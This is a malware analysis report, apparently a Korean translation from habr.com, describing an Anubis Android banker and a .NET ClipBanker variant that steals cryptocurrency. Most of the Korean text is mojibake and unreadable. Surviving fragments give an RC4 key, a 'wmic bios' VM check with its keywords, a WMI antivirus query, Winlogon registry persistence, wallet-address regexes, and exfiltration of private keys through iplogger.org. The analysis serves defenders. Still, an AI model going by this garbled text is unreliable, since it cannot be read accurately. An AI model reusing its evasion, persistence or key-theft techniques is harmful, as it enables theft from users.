๊ตฌ์ฑ ์์๋ APK(Android ์ ํ๋ฆฌ์ผ์ด์ ํจํค์ง)๋ก ํธ์คํ ๋์์ต๋๋ค. ๋งค์ฐ ๋๋ ํ๋์ด ์์ต๋๋ค. ์ ์ฑ ํ์๋ APK์ ์๋ ์ํธํ๋ JAR์ ์จ๊ฒจ์ ธ ์์ต๋๋ค. ๋ค์ ํค๋ฅผ ์ฌ์ฉํ์ฌ RC4๋ก ์ํธํ๋ฉ๋๋ค.
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
๋ฌธ์์ด์ ์ํธํํ๋ ๋ฐ ๋์ผํ ํค์ ์๊ณ ๋ฆฌ์ฆ์ด ์ฌ์ฉ๋ฉ๋๋ค. JAR์ ๋ค์ ์์น์ ์์ต๋๋ค. APK_ROOT + image/files
. ํ์ผ์ ์ฒ์ 4๋ฐ์ดํธ์๋ ๊ธธ์ด ํ๋ ๋ฐ๋ก ๋ค์์ ์์๋๋ ์ํธํ๋ JAR์ ๊ธธ์ด๊ฐ ํฌํจ๋ฉ๋๋ค.
ํ์ผ์ ์ํธ๋ฅผ ํด๋
ํ ๊ฒฐ๊ณผ ์ด์ ์ Anubis๋ผ๋ ๊ฒ์ ๋ฐ๊ฒฌํ์ต๋๋ค.
- ๋ง์ดํฌ ๋ น์
- ์คํฌ๋ฆฐ์ท ์ฐ๊ธฐ
- GPS ์ขํ ๊ฐ์ ธ์ค๊ธฐ
- ํค๋ก๊ฑฐ
- ๊ธฐ๊ธฐ ๋ฐ์ดํฐ ์ํธํ ๋ฐ ๋ชธ๊ฐ ์๊ตฌ
- ์คํธ
ํฅ๋ฏธ๋กญ๊ฒ๋ ์ด ์ํ๊ฐ๋ ๋ ๋ค๋ฅธ C&C ์๋ฒ๋ฅผ ํ๋ณดํ๊ธฐ ์ํด ํธ์ํฐ๋ฅผ ๋ฐฑ์ ํต์ ์ฑ๋๋ก ์ฌ์ฉํ์ต๋๋ค. ์ฐ๋ฆฌ๊ฐ ๋ถ์ํ ์ํ์ @JonesTrader ๊ณ์ ์ ์ฌ์ฉํ์ง๋ง ๋ถ์ ๋น์์๋ ์ด๋ฏธ ์ฐจ๋จ๋์ด ์์์ต๋๋ค.
Banker์๋ Android ๊ธฐ๊ธฐ์ ๋์ ์ ํ๋ฆฌ์ผ์ด์ ๋ชฉ๋ก์ด ํฌํจ๋์ด ์์ต๋๋ค. Sophos ์ฐ๊ตฌ์์ ์ป์ ๋ชฉ๋ก๋ณด๋ค ๊น๋๋ค. ๋ชฉ๋ก์๋ ๋ค์ํ ๋ฑ ํน ์ ํ๋ฆฌ์ผ์ด์ , Amazon ๋ฐ eBay์ ๊ฐ์ ์จ๋ผ์ธ ์ผํ ํ๋ก๊ทธ๋จ, ์ํธํํ ์๋น์ค๊ฐ ํฌํจ๋ฉ๋๋ค.
MSIL/ClipBanker.IH
์ด ์บ ํ์ธ์ ์ผ๋ถ๋ก ๋ฐฐํฌ๋ ๋ง์ง๋ง ๊ตฌ์ฑ ์์๋ 2019๋ 1.0.0์์ ๋ฑ์ฅํ .NET Windows ์คํ ํ์ผ์ด์์ต๋๋ค. ์ฐ๊ตฌ๋ ๋๋ถ๋ถ์ ๋ฒ์ ์ ConfuserEx vXNUMX๊ณผ ํจ๊ป ํจํค์ง๋์์ต๋๋ค. ClipBanker์ ๋ง์ฐฌ๊ฐ์ง๋ก ์ด ๊ตฌ์ฑ ์์๋ ํด๋ฆฝ๋ณด๋๋ฅผ ์ฌ์ฉํฉ๋๋ค. ๊ทธ์ ๋ชฉํ๋ ๋ค์ํ ์ํธํํ์ Steam์์์ ์ํ์ ์ ๊ณตํ๋ ๊ฒ์ ๋๋ค. ๋ํ ๊ทธ๋ IP Logger ์๋น์ค๋ฅผ ์ฌ์ฉํ์ฌ ๋นํธ์ฝ์ธ โโ๊ฐ์ธ WIF ํค๋ฅผ ํ์นฉ๋๋ค.
๋ณดํธ ๋ฉ์ปค๋์ฆ
ConfuserEx๋ ๋๋ฒ๊น
, ๋คํ ๋ฐ ๋ณ์กฐ๋ฅผ ๋ฐฉ์งํ๋ ๋ฐ ์ ๊ณต๋๋ ์ด์ ์ธ์๋ ๋ฐ์ด๋ฌ์ค ๋ฐฑ์ ์ ํ ๋ฐ ๊ฐ์ ๋จธ์ ์ ํ์งํ๋ ๊ธฐ๋ฅ์ ํฌํจํฉ๋๋ค.
๊ฐ์ ๋จธ์ ์์ ์คํ๋๋์ง ํ์ธํ๊ธฐ ์ํด ์ ์ฑ์ฝ๋๋ ๋ด์ฅ๋ Windows WMI ๋ช ๋ น์ค(WMIC)์ ์ฌ์ฉํ์ฌ ๋ค์๊ณผ ๊ฐ์ BIOS ์ ๋ณด๋ฅผ ์์ฒญํฉ๋๋ค.
wmic bios
๊ทธ๋ฐ ๋ค์ ํ๋ก๊ทธ๋จ์ ๋ช ๋ น ์ถ๋ ฅ์ ๊ตฌ๋ฌธ ๋ถ์ํ๊ณ VBOX, VirtualBox, XEN, qemu, bochs, VM์ด๋ผ๋ ํค์๋๋ฅผ ์ฐพ์ต๋๋ค.
๋ฐ์ด๋ฌ์ค ๋ฐฑ์ ์ ํ์ ํ์งํ๊ธฐ ์ํด ๋งฌ์จ์ด๋ ๋ค์์ ์ฌ์ฉํ์ฌ Windows ๋ณด์ ์ผํฐ์ WMI(Windows Management Instrumentation) ์์ฒญ์ ๋ณด๋
๋๋ค. ManagementObjectSearcher
API๋ ์๋์ ๊ฐ์ต๋๋ค. base64์์ ๋์ฝ๋ฉํ ํ ํธ์ถ์ ๋ค์๊ณผ ๊ฐ์ต๋๋ค.
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
๊ทธ๋ฆผ 3. ๋ฐ์ด๋ฌ์ค ๋ฐฑ์ ์ ํ ์๋ณ ํ๋ก์ธ์ค.
๋ํ ์
์ฑ์ฝ๋๋ ๋ค์๊ณผ ๊ฐ์ ์ฌํญ์ ํ์ธํฉ๋๋ค.
๊ณ ์ง
์ฐ๋ฆฌ๊ฐ ์ฐ๊ตฌํ ๋งฌ์จ์ด ๋ฒ์ ์ ์์ ์ ๋ณต์ฌํฉ๋๋ค. %APPDATA%googleupdater.exe
Google ๋๋ ํ ๋ฆฌ์ '์จ๊น' ์์ฑ์ ์ค์ ํฉ๋๋ค. ๊ทธ๋ฐ ๋ค์ ๊ทธ๋
๋ ๊ฐ์ ๋ณ๊ฒฝํฉ๋๋ค. SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell
Windows ๋ ์ง์คํธ๋ฆฌ์ ๊ฒฝ๋ก๋ฅผ ์ถ๊ฐํฉ๋๋ค. updater.exe
. ์ด๋ ๊ฒ ํ๋ฉด ์ฌ์ฉ์๊ฐ ๋ก๊ทธ์ธํ ๋๋ง๋ค ์
์ฑ์ฝ๋๊ฐ ์คํ๋ฉ๋๋ค.
์ ์์ ์ธ ํ๋
ClipBanker์ ๋ง์ฐฌ๊ฐ์ง๋ก ์ด ์ ์ฑ์ฝ๋๋ ํด๋ฆฝ๋ณด๋์ ๋ด์ฉ์ ๋ชจ๋ํฐ๋งํ์ฌ ์ํธํํ ์ง๊ฐ ์ฃผ์๋ฅผ ์ฐพ๊ณ , ๋ฐ๊ฒฌ๋๋ฉด ์ด๋ฅผ ์ด์์์ ์ฃผ์ ์ค ํ๋๋ก ๋์ฒดํฉ๋๋ค. ๋ค์์ ์ฝ๋์์ ๋ฐ๊ฒฌ๋ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํ ๋์ ์ฃผ์ ๋ชฉ๋ก์ ๋๋ค.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
๊ฐ ์ฃผ์ ์ ํ์ ํด๋นํ๋ ์ ๊ท์์ด ์์ต๋๋ค. STEAM_URL ๊ฐ์ ๋ฒํผ์์ ์ ์ํ๋ ๋ฐ ์ฌ์ฉ๋๋ ์ ๊ท ํํ์์์ ๋ณผ ์ ์๋ฏ์ด Steam ์์คํ ์ ๊ณต๊ฒฉํ๋ ๋ฐ ์ฌ์ฉ๋ฉ๋๋ค.
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
์ ์ถ ์ฑ๋
์ด ์ ์ฑ์ฝ๋๋ ๋ฒํผ์ ์ฃผ์๋ฅผ ๋ฐ๊พธ๋ ๊ฒ ์ธ์๋ ๋นํธ์ฝ์ธ, ๋นํธ์ฝ์ธ โโ์ฝ์ด, ์ผ๋ ํธ๋ผ ๋นํธ์ฝ์ธ โโ์ง๊ฐ์ ๊ฐ์ธ WIF ํค๋ฅผ ํ์ ์ผ๋ก ์ผ์ต๋๋ค. ์ด ํ๋ก๊ทธ๋จ์ plogger.org๋ฅผ ์ถ์ถ ์ฑ๋๋ก ์ฌ์ฉํ์ฌ WIF ๊ฐ์ธ ํค๋ฅผ ์ป์ต๋๋ค. ์ด๋ฅผ ์ํด ์ด์์๋ ์๋์ ๊ฐ์ด User-Agent HTTP ํค๋์ ๊ฐ์ธ ํค ๋ฐ์ดํฐ๋ฅผ ์ถ๊ฐํฉ๋๋ค.
๊ทธ๋ฆผ 4. ์ถ๋ ฅ ๋ฐ์ดํฐ๊ฐ ์๋ IP ๋ก๊ฑฐ ์ฝ์.
์ด์์๋ ์ง๊ฐ์ ์ ์ถํ๊ธฐ ์ํด iplogger.org๋ฅผ ์ฌ์ฉํ์ง ์์์ต๋๋ค. ์๋ง๋ ํ๋์ 255์ ์ ํ์ผ๋ก ์ธํด ๋ค๋ฅธ ๋ฐฉ๋ฒ์ ์ฌ์ฉํ์ ๊ฒ์
๋๋ค. User-Agent
IP Logger ์น ์ธํฐํ์ด์ค์ ํ์๋ฉ๋๋ค. ์ฐ๋ฆฌ๊ฐ ์ฐ๊ตฌํ ์ํ์์ ๋ค๋ฅธ ์ถ๋ ฅ ์๋ฒ๋ ํ๊ฒฝ ๋ณ์์ ์ ์ฅ๋์์ต๋๋ค. DiscordWebHook
. ๋๋๊ฒ๋ ์ด ํ๊ฒฝ ๋ณ์๋ ์ฝ๋ ์ด๋์๋ ํ ๋น๋์ง ์์ต๋๋ค. ์ด๋ ํด๋น ์
์ฑ์ฝ๋๊ฐ ์์ง ๊ฐ๋ฐ ์ค์ด๋ฉฐ ํด๋น ๋ณ์๊ฐ ์ด์์์ ํ
์คํธ ๋จธ์ ์ ํ ๋น๋์ด ์์์ ์๋ฏธํฉ๋๋ค.
ํ๋ก๊ทธ๋จ์ด ๊ฐ๋ฐ ์ค์ด๋ผ๋ ๋ ๋ค๋ฅธ ์ ํธ๊ฐ ์์ต๋๋ค. ๋ฐ์ด๋๋ฆฌ ํ์ผ์๋ ๋ ๊ฐ์ iplogger.org URL์ด ํฌํจ๋์ด ์์ผ๋ฉฐ ๋ฐ์ดํฐ๊ฐ ์ ์ถ๋ ๋ ๋ ๋ค ์ฟผ๋ฆฌ๋ฉ๋๋ค. ์ด๋ฌํ URL ์ค ํ๋์ ๋ํ ์์ฒญ์์ Referer ํ๋์ ๊ฐ ์์๋ "DEV /"๊ฐ ๋ถ์ต๋๋ค. ๋ํ ConfuserEx๋ฅผ ์ฌ์ฉํ์ฌ ํจํค์ง๋์ง ์์ ๋ฒ์ ๋ ๋ฐ๊ฒฌํ์ต๋๋ค. ์ด URL์ ์์ ์๋ DevFeedbackUrl์ ๋๋ค. ํ๊ฒฝ ๋ณ์๋ช ์ผ๋ก ๋ณผ ๋, ์ด์์๋ ํฉ๋ฒ์ ์ธ ์๋น์ค์ธ Discord์ ํด๋น ์น ์ฐจ๋จ ์์คํ ์ ์ด์ฉํด ์ํธํํ ์ง๊ฐ์ ํ์ทจํ๋ ค๋ ๊ณํ์ ๊ฐ๊ณ ์๋ ๊ฒ์ผ๋ก ํ๋จ๋ฉ๋๋ค.
๊ฒฐ๋ก
์ด ์บ ํ์ธ์ ์ฌ์ด๋ฒ ๊ณต๊ฒฉ์์ ํฉ๋ฒ์ ์ธ ๊ด๊ณ ์๋น์ค๋ฅผ ์ฌ์ฉํ ์์ ๋๋ค. ์ด ๊ณํ์ ๋ฌ์์ ์กฐ์ง์ ํ์ ์ผ๋ก ์ผ๊ณ ์์ง๋ง ๋ฌ์์ ์ด์ธ์ ์๋น์ค๋ฅผ ์ฌ์ฉํ์ฌ ๊ทธ๋ฌํ ๊ณต๊ฒฉ์ ํ๋ ๊ฒ์ ๋๋ผ์ด ์ผ์ด ์๋๋๋ค. ์์์ ๋ฐฉ์งํ๋ ค๋ฉด ์ฌ์ฉ์๋ ๋ค์ด๋ก๋ํ๋ ์ํํธ์จ์ด ์์ค์ ํํ์ ํ์ ํด์ผ ํฉ๋๋ค.
์นจํด ์งํ ๋ฐ MITRE ATT&CK ์์ฑ์ ์ ์ฒด ๋ชฉ๋ก์ ๋ค์์์ ํ์ธํ ์ ์์ต๋๋ค.
์ถ์ฒ : habr.com